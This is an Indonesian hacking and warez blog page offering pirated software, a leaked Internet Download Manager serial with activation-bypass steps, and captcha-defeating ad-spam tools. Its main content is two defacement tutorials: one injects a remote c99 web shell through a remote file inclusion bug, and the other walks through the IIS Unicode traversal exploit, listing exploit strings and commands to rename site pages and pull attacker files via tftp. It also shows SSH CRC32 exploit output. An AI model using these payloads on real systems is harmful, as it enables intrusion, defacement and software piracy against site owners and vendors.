Recent Post

1 Januari 2011

1/1 V-HACKER

     
    V-HACKER    
   
free google sketchUp pro 8 - NEW - 3D sketch maker
January 1, 2011 at 11:08 AM
 
Download Google SketchUp Pro 8 Terbaru Full Version

Google SketchUp Pro adalah Perangkat lunak model 3D untuk profesional dapat membuat model 3D dari rumah, gudang, deck, proyek-proyek pertukangan. Anda dapat menambahkan detil, tekstur, dan kaca untuk model Anda, dan desain dengan akurasi dimensi. SketchUp mudah dan intuitif, sehingga siapapun bisa membuat model 3D dengan cepat dan akurat. Dengan menggunakan model 3D, desainer dapat membuat lebih banyak ide,proyek.Google SketchUp adalah cara yang bagus untuk mengetahui dan melihat apakah 3D modeling yang tepat bagi Anda.

Disitusnya untuk mendapakan yang Lisenced atau Full Version anda harus membayar $495,Merupakan Nilai yang Besar. Tapi Di InternetTeknologi.Com anda akan Mendapatkannya Secara Gratis.


Silahkan Download Google SketchUp Pro 8 Terbaru Full Version disini (64,3Mb) disini 


   
   
Esset BE(bussiness edition) Smart Security 4 License Key
January 1, 2011 at 11:01 AM
 
FREE LICENSE - BUSSINESS EDITION ESSET
Esset BE Smart Security 4 License Key

LANGSUNG SAJA DOWNLOAD HERE


DOWNLOAD HERE


http://www.ziddu.com/download/13212116/artSecurityBusinessEdition200PC20.05.2011-pc-alert.zip.html


   
   
January 1, 2011 at 10:56 AM
 
software autosubmit yang berguna untuk mengirim iklan secara otomatis ke 1324 situs iklan baris indonesia sekaligus

Dengan software AutoSubmit anda tidak perlu repot harus mengunjungi website iklan baris satu persatu untuk memasang iklan anda. Aplikasi ini dapat digunakan untuk mengirim iklan ke RATUSAN website iklan baris hanya dengan sekali klik, tidak perlu repot, cukup luangkan sedikit waktu anda untuk mempromosikan produk dan jasa anda.

Ingin tahu seperti apa programnya bekerja?
anda bisa melihat screenshot program autosubmit, klik disini

Fitur fitur autosubmit dalam memasang iklan baris

  1. Captcha Characters RecognizerFitur Captcha Characters Recognizer, yang dapat mengenali karakter yang terdapat dalam captcha, sehingga untuk situs situs iklan baris yang captchanya dapat dikenali oleh program, anda tidak perlu menginput kode captcha nya lagi karena sudah otomatis diinputkan oleh program. Dari 1324 situs iklan baris yang dapat di submit oleh program autosubmit, 1154 diantaranya anda sudah tidak perlu menjawab pertanyaan captcha kode lagi, karena program kami sudah dapat mengenali karakter di captcha kode tersebut.

  2. Fitur Random Characters Insertion, yang jika anda aktifkan, otomatis menambahkan beberapa karakter random yang tidak akan mengubah arti dari iklan anda pada bagian judul dan isi iklan anda, sehingga dapat menghindari filter duplicate content pada sebagian situs situs iklan baris yang tidak memperbolehkan ada lebih dari 1 iklan baris dengan isi yang sama.

  3. Bisa menentukan kapan iklan anda kadaluarsa (expire) untuk pemasangan pada situs situs iklan baris yg mensupport tanggal kadaluarsa iklan.

  4. Data iklan anda tersimpan di server autosubmit, sehingga walaupun komputer anda habis di format ulang, atau anda sedang tidak menggunakan komputer anda. Data iklan anda yg sudah anda definisikan tetap muncul pada saat anda login ke account anda di program autosubmit, tanpa perlu anda mengetikkan ulang.

  5. Proses pemasangan iklan secara multithread/simultan.

  6. Report gagal / sukses disertai dengan tampilan preview halaman website situs iklan baris pada saat pemasangan iklan gagal/sukses di lakukan di situs iklan baris tsb.

  7. Tampilan dalam bahasa Indonesia.




LANGSUNG SAJA
DIDOWNLOAD

Download

File Desc: AutoSubmit V. 1.9 Installer
File Size: 4,09 MB


   
   
AUTOSUBMIT : software pengirim iklan otomatis
January 1, 2011 at 10:56 AM
 
software autosubmit yang berguna untuk mengirim iklan secara otomatis ke 1324 situs iklan baris indonesia sekaligus

Dengan software AutoSubmit anda tidak perlu repot harus mengunjungi website iklan baris satu persatu untuk memasang iklan anda. Aplikasi ini dapat digunakan untuk mengirim iklan ke RATUSAN website iklan baris hanya dengan sekali klik, tidak perlu repot, cukup luangkan sedikit waktu anda untuk mempromosikan produk dan jasa anda.

Ingin tahu seperti apa programnya bekerja?
anda bisa melihat screenshot program autosubmit, klik disini

Fitur fitur autosubmit dalam memasang iklan baris

  1. Captcha Characters RecognizerFitur Captcha Characters Recognizer, yang dapat mengenali karakter yang terdapat dalam captcha, sehingga untuk situs situs iklan baris yang captchanya dapat dikenali oleh program, anda tidak perlu menginput kode captcha nya lagi karena sudah otomatis diinputkan oleh program. Dari 1324 situs iklan baris yang dapat di submit oleh program autosubmit, 1154 diantaranya anda sudah tidak perlu menjawab pertanyaan captcha kode lagi, karena program kami sudah dapat mengenali karakter di captcha kode tersebut.

  2. Fitur Random Characters Insertion, yang jika anda aktifkan, otomatis menambahkan beberapa karakter random yang tidak akan mengubah arti dari iklan anda pada bagian judul dan isi iklan anda, sehingga dapat menghindari filter duplicate content pada sebagian situs situs iklan baris yang tidak memperbolehkan ada lebih dari 1 iklan baris dengan isi yang sama.

  3. Bisa menentukan kapan iklan anda kadaluarsa (expire) untuk pemasangan pada situs situs iklan baris yg mensupport tanggal kadaluarsa iklan.

  4. Data iklan anda tersimpan di server autosubmit, sehingga walaupun komputer anda habis di format ulang, atau anda sedang tidak menggunakan komputer anda. Data iklan anda yg sudah anda definisikan tetap muncul pada saat anda login ke account anda di program autosubmit, tanpa perlu anda mengetikkan ulang.

  5. Proses pemasangan iklan secara multithread/simultan.

  6. Report gagal / sukses disertai dengan tampilan preview halaman website situs iklan baris pada saat pemasangan iklan gagal/sukses di lakukan di situs iklan baris tsb.

  7. Tampilan dalam bahasa Indonesia.




LANGSUNG SAJA
DIDOWNLOAD

Download

File Desc: AutoSubmit V. 1.9 Installer
File Size: 4,09 MB


   
   
free great sms software - INDONESIAN software
January 1, 2011 at 10:44 AM
 
gili-promo-perdana.jpg
Gili-SMS merupakan software SMS yang dikembangkan dari Gili (freeware).
Gili-SMS dapat dipergunakan sebagai sarana untuk :
  • SMS Marketing
  • SMS Promosi produk barang dan jasa
  • SMS dakwah
  • SMS Pemberitahuan
  • SMS untuk layanan komunitas
Saat ini banyak operator saling memberikan SMS murah bahkan gratis, mulai dari ratusan sampai puluhan ribu SMS setiap hari. Anda dapat memanfaatkan momen ini untuk menunjang usaha dengan memberikan informasi, promosi atau layanan melalui SMS kepada relasi dan pelanggan. Hal ini dapat meningkatkan marketing, memberikan rasa kepercayaan dan nilai lebih. Gili-SMS membantu dalam memproses dan mengelola SMS sehingga menghemat waktu anda dalam bekerja.
Release Gili-SMS diperkirakan pada akhir bulan Desember 2010.

UNTUK MENDOWNLOAD GRATIS 
SILAHKAN KLIK LINK DOWNLO\AD DI BAWAH INI


DOWNLOAD HERE GILI SMS - FREE





FITUR :
Proteksi program dengan password agar tidak bisa digunakan oleh user lain yang menggunakan komputer

  • Pencatatan data kontak terdiri atas : nama, alamat, kota, no hp, tgl. lahir, keterangan
  • Pencatatan data grup kontak terdiri atas : nama grup dan keterangan. 1 kontak bisa tercatat di lebih dari 1 grup
  • Seting grup dan kontak
  • Import data kontak dan grup dari Excel
  • Otomatis mengetahui jenis operator (telkomsel, XL, Indosat dll) dari nomor HP kontak
  • SMS ke banyak nomor melalui grup kontak sampai 1600 karakter per nomor
Pencarian SMS




   
   
free telkomsel flash booster client
January 1, 2011 at 10:32 AM
 
LANGSUNG SAJA DOWNLOAD VIA LINK BERIKUT




DOWNLOAD HERE


   
   
SCRIPT duplikat situs MILWORM
January 1, 2011 at 9:32 AM
 

duplikat situs Milworm script



siapa yang tidak tahu milworm apalagi dia seorang hacker karena milworm adalah situs terkenelan bagi para underground di dunia maya


   
   
cara merubah IDM menjadi full version
January 1, 2011 at 9:32 AM
 
Cara Merubah IDM Menjadi Full Version
Internet Download Manager (IDM) merupakan software download manager terbaik saat ini. Software tersebut dapat memudahkan kita untuk mendownload file di internet, misalnya saat kita sedang menonton video di Youtube, maka video yang kita saksikan bisa di download secara langsung melalui program IDM ini, software ini pun mempunyai stabilitas untuk mendownload file, dengan fitur resume dan pause, serta bisa mempercepat proses download.

Kita bisa mendownload software ini dari situs resminya pada alamat internetdownloadmanager.com.
Namun, sebernarnya IDM ini adalah software berbayar. Jadi, jika kita mendownload langsung dari situs resminya akan diberikan trial 30 hari, dan setelah masa trial habis Anda harus membeli lisensi dari software ini dengan harga yang lumayan mahal. Untuk itu, saya akan memberikan cara bagaimana membuat IDM yang trial ini menjadi full version.

Berikut langkah - langkahnya :

Jika di komputer Anda sudah terinstall software IDM dan masa trialnya sudah habis maka akan muncul peringatan bahwa Anda harus membeli lisensi software ini agar dapat menggunakannya lagi.


Untuk membuatnya menjadi full version, maka harus ada cara khusus untuk menanganinya. Langkah pertama adalah buka program IDM, jika tidak terdapat shortcut di desktop, Anda harus membukanya dari folder instalasi IDM dan biasanya ada di drive C:/Program Files/InternetDownloadManager, setelah jendela IDM terbuka, pilih menu download dan klik option.


Setelah jendela option terbuka, pilih tab Dial Up dan hilangkan tanda centang pada kotak Use Windows Dial Up Networking, lalu klik OK.


Setelah jendela untuk memasukkan serial number terbuka, masukkan nama lengkap Anda, misal AZ pada First Name, dan COMSOFT pada kolom Last Name, kemudian masukkan alamat email Anda, dan yang paling penting adalah serial numbernya. Masukkan kode LX2HH-76JYH-BWU14-V9AEG pada kolom serial number, tetapi pada saat pengisian serial number, koneksi internet Anda harus dimatikan terlebih dahulu. Hal ini mencegah IDM untuk melakukan validasi online melalui internet.


Kemudian klik OK, lalu buka program IDM tersebut. Maka software IDM (Internet Download Manager) di komputer Anda akan menjadi full version. Selamat Mencoba!


   
   
AVG PC-TUNEUP 2011- FREE DOWNLOAD
January 1, 2011 at 9:32 AM
 
Download AVG PC Tuneup 2011 v10.0.0.23 Multilingual Full Version
AVG PC Tuneup adalah Sebuah program Toserba Utilities Terbaru dari AVG untuk mengoptimalkan PC atau Laptop,memperbaiki masalah yang mempengaruhi performa PC dan nikmati PC yang berjalan lebih cepat.Singkirkan jejak yang menceritakan aktivitas Anda dan file yang ingin Anda hapus untuk meningkatkan kecepatan pc anda.

Perbaiki masalah register yang menyebabkan macet dan crash

Pembersih Register dan Perapi Register

Perbaiki register yang berserakan dan rusak yang menghabiskan memori, memperlambat aplikasi Anda dan menyebabkan masalah stabilitas keseluruhan.
Pembersih disk memindai hard drive untuk mencari file yang menghabiskan ruang disk dan memperlambat komputer Anda. Ini mungkin mencakup file sementara, cache peramban Internet atau file sampah. Pembersih register memindai register Anda untuk memperbaiki masalah yang menyebabkan komputer melambat, macet atau bahkan crash.

Mengoptimalkan koneksi Internet Anda
Pengoptimal Internet

Pengoptimal Internet secara otomatis menyetel pengaturan koneksi Internet Anda untuk mempercepat aktivitas online Anda.
Alat ini akan mempercepat koneksi Internet Anda dengan mengoptimalkan pengaturan - termasuk Max MTU dan RWIN - khususnya untuk tipe koneksi Internet yang Anda gunakan. Selain itu, pengoptimal Internet akan mengetes pengaturan koneksi Anda sebelum menerapkan perubahan.

Memulihkan file yang terhapus tidak sengaja
Pemulihan file

AVG PC Tuneup hadir lengkap dengan alat pemulihan file sehingga Anda dapat memulihkan file yang rusak atau tidak sengaja terhapus dalam Windows.
Alat ini akan memulihkan file yang tidak sengaja terhapus atau file yang rusak. Pemulihan file juga memungkinkan Anda untuk melihat cuplikan foto dan dokumen sambil menjelajahi daftar file yang ditemukan.

Menghapus file dan membersihkan disk secara permanen
Penghancur file dan penyapu disk

Menghapus file atau folder menghilangkan referensi mereka tapi tidak menghapus data sebenarnya yang tersimpan dalam file. Ini artinya file yang Anda anggap telah dihapus dapat dengan mudah dikembalikan.
Penghancur file menghapus file secara permanen sehingga data pribadi Anda tidak dapat dipulihkan. Alat ini menyediakan empat opsi proses penghancuran, yang berkisar dari proses penghancuran cepat hingga setingkat keamanan militer. Alat pembersih disk dapat digunakan untuk membersihkan seisi drive dan untuk memberikan keamanan ekstra. Anda juga dapat mematikan pemulihan sistem saat membersihkan disk untuk menjamin tidak terjadi penyalinan file selama pembersihan.

Melindungi privasi Anda
Penghapus jejak

Banyak informasi tentang aktivitas Anda direkam dalam PC. Penghapus jejak akan membantu Anda melindungi privasi dengan menghapus informasi pribadi ini dari komputer Anda.
Saat Anda menjelajahi internet, membuka dokumen atau menjalankan program, aktivitas Anda terekam. Penghapus jejak menyembunyikan jejak ini sehingga tidak ada yang dapat melihat situs web mana yang telah Anda kunjungi atau dokumen mana yang baru saja Anda buka.

Meningkatkan kecepatan disk Anda
Perapi disk dan register Windows

Defragmentasi disk mengoptimalkan sistem file Anda untuk mengoptimalkan hard drive. Nikmati hard disk yang lebih cepat dan komputer yang berjalan lebih stabil dan lancar.
Perapi disk menyusun ulang file pada disk Anda sehingga dapat dibaca dan ditulis dengan cepat. Ini meningkatkan waktu respons aplikasi, kecepatan boot sistem dan performa komputer keseluruhan. Alat yang sama membersihkan register Windows Anda dengan menulisnya ulang untuk menghilangkan fragmentasi, ruang kosong yang terpecah dan kerusakan struktur

Disitusnya untuk 2 tahun Berlangganan anda harus membayar Rp 355.100, Tapi di InternetTeknologi.Com anda kan mendapatkan secara Gratis.

Silahkan Download disini
__________________


   
   
DEFACE website dengan RFI (REMOTE FILE Inclusion)
January 1, 2011 at 9:05 AM
 
Cara mendefaca dengan RFI (Remote File Inclusion) disini akan menceritakanbagaimana akhirnya bisa mengerti metode RFI Hacking sebelum kita masuk kedalam RFI ada baiknya mengetahui Web-shell dahulu,sebab nanti ini kan di pakai dalam RFI macam-macam web-shell: 1. c99 2. c100 3. r57 4. ekin0x 5. locus7 bagamana mencarinya backdoor tersebut, kita cari melalui google lagi-lagi intro nih, yups betul, agar lebih paham aja gitu RFI apa itu???? RFI(Remote File Inclusion) adalah salah satu metode hacking dengan memanfaatkan pintu belkang atau sering disebut backdoor! ======= PERTAMA ======= sebelum penyerangan,marilah kita berdoa menurut agama dan kepercayaan masing2........... AMIEN !!! ======= KEDUA ======= ok setelah kita bedoa, bukalah www.milw0rm.com kemudian klik search kemudian tulislah RFI ======== KETIGA ======== udah kebuka tuh banyak sekali bug RFI disitu, pilih salah satu ========= KEEMPAT ========= setelah kita dapat bugnya kemudian kita search denga google example bug: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[evil code] ======== KELIMA ======== kemudian search lah dengan google, apabila kita telah mendapatkan sitenya, trus kita taro file backdoor example: wwww.coba-coba.com/administrator/component/com_profiler/plugin.class.php?mosConfig_absolute_path=www.punyague.net/backdoor/c99.txt?? ======== KEENAM ======== apabila dibrowser tidak ada tampilan apa2 hanya tampilan site biasa,maka site tersebut sudah tidak vuln lagi apabila dibrowser anda ada tampilan backdoor, maka site tersebut telah anda kuasai, dan selanjutnya terserah anda... perintah yang berguna saat melakukan aktivitas backdooring: cd namadirectory = Melihat Suatu directory ls -al = Melihat Suatu Directory Lebih Dalam lagi fined = Mengecek Directory directory cat = Membaca Suatu Berkas wget = MengUpload suatu Files tar -zxvf = MengExtraxt suatu files yang berbentuk tgz pwd = Mengetahui Di Directory mana Kita Berada uname -a = Keberadaan Path berada w = Mengetahui Siapa Saja yang telah menggunakan Shell. curl = mendownload url sekian tutorial dari gue, bukannya gue mau sok tahu, tapi gue cuma mau berbagi apa yang udah gue dapet selama ini, apabila da yang kurang mohon muf gretz: Mywisdom,flyf_666,petimati,7460,gunslinger_,sat_ n soon we are devilzc0de crew run with bug n exploits


   
   
- - - - - - -DEFACE WEBSITE - - - - - - -
January 1, 2011 at 7:21 AM
 
INI REPOST
tapi masih working sampai sekarang
jadi dibahas lagi sebagai pembelajaran dalam hacking - black suicide sub : DEFACE


Pada posting ini kita coba membahas "deface website" apa itu ?? Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya ilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo sob adalah web master dan sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :

1. IIS (server untuk microsoft, dkk)
2. Unix(linux,BSD,IRIX,SOLARIS,dsb)

elalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! gn bilang sapa2 yah sebenernyah sayah teh emang gak tau ... Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah
kowe.....Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg
bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering kita gunakan ehehhehehhee...contoh:

http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server
target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL
diatas menjadi empat bagian yaitu :
· Bagian host, yaitu "http://www.targethost.com"
· Bagian exploit string, yaitu "/scripts/..%255c..%255c"
· Bagian folder, yaitu "/winnt/system32/"
· Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\" atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah :
C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih. lagehh... .hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah..... truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah... contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.

*Cara pertama :*
Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

Pasti hasilnya akan seperti di bawah ini :

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.

Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.

Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :

dapat dilihat disini
Kita liat apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi

Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :

  • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
  • Bagian command yaitu, cmdku.exe?/c+echo+
  • Bagian HTML
  • Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,
    C:\InetPub\wwwroot\main.html
Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya :
  • http://www.targethost.com/scripts/..%255c..%255c
    /winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
    up-load)+ C:\InetPub\wwwroot\main.html
Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.

Sayah akan uraikan juga URL tadee menjadi 4 bagian :
  • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
  • Bagian folder, yaitu /winnt/system32/
  • Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+
  • Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,
    C:\InetPub\wwwroot\main.html
Kekurangannyah dalam meng-upload file lewat TFTP32terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.

Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini.

--------------------------------------------END--------------------------------------------------

Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan untuk masuk ke server IIS, untuk hal ini kalian bisa cari di situs2 cyber underground...hehehehe "yang kreatif donk..!!"

Okeh sekrang kita ke UNIX yah...di unix sendiri yang perlu dilakukan untuk men-deface situs adalah memperoleh fasilitas root dari server tsb. Cara memperoleh fasilitas root tentu saja melalui exploit (mengenai masalah exploit bisa kalian lihat di bagian "Hacking Shell"). Nah disini gue akan memberi salah satu contoh mendapatkan fasilitas root dari exploit "SSH CRC32 Exploit", exploit ini ditujukan pada SSH server yang berjalan pada SSH protocol 1 atau SSH protocol 2 configured to drop back to protocol 1 Ketika berjalan exploitnya akan bekerja seperti ini :

[root@juventini]# ./x10 -t1 192.168.1.120

password:

Target: Small - SSH-1.5-1.2.26

Attacking: 192.168.1.120:22
Testing if remote sshd is vulnerable # ATTACH NOWYES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SEGV #
(4 ) binary-search: h: 0x083f77fc, slider: 0x00004000 # SURVIVED #
(5 ) binary-search: h: 0x083f97fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fa7fc, slider: 0x00001000 # SEGV #
(7 ) binary-search: h: 0x083f9ffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083f9bfc, slider: 0x00000400 # SEGV #
(9 ) binary-search: h: 0x083f99fc, slider: 0x00000200 # SURVIVED #
(10) binary-search: h: 0x083f9afc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083f9a7c, slider: 0x00000080 # SEGV #
(12) binary-search: h: 0x083f9a3c, slider: 0x00000040 # SEGV #
(13) binary-search: h: 0x083f9a1c, slider: 0x00000020 # SEGV #
(14) binary-search: h: 0x083f9a0c, slider: 0x00000010 # SURVIVED #
(15) binary-search: h: 0x083f9a14, slider: 0x00000008 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083f9a14 # SURVIVED #
Exact match found at: 0x000065ec
Looking for exact buffer address
Finding exact buffer address
(17) Trying: 0x080865ec # SURVIVED #
Finding distance till stack buffer
(18) Trying: 0xb7f81400 # SEGV #
(19) Trying: 0xb7f81054 # SEGV #
(20) Trying: 0xb7f80ca8 # SEGV #
(21) Trying: 0xb7f808fc # SEGV #
(22) Trying: 0xb7f80550 # SEGV #
(23) Trying: 0xb7f801a4 # SEGV #
(24) Trying: 0xb7f7fdf8 # SEGV #
(25) Trying: 0xb7f7fa4c # SEGV #
(26) Trying: 0xb7f7f6a0 # SEGV #
(27) Trying: 0xb7f7f2f4 # SEGV #
(28) Trying: 0xb7f7ef48 # SEGV #
(29) Trying: 0xb7f7eb9c # SEGV #
(30) Trying: 0xb7f7e7f0 # SEGV #
(31) Trying: 0xb7f7e444 # SEGV #
(32) Trying: 0xb7f7e098 # SURVIVED # verifying
(33) Trying: 0xb7f7e098 # SEGV # OK
Finding exact h - stack_buf distance
(34) trying: 0xb7f7de98 slider: 0x0200# SURVIVED #
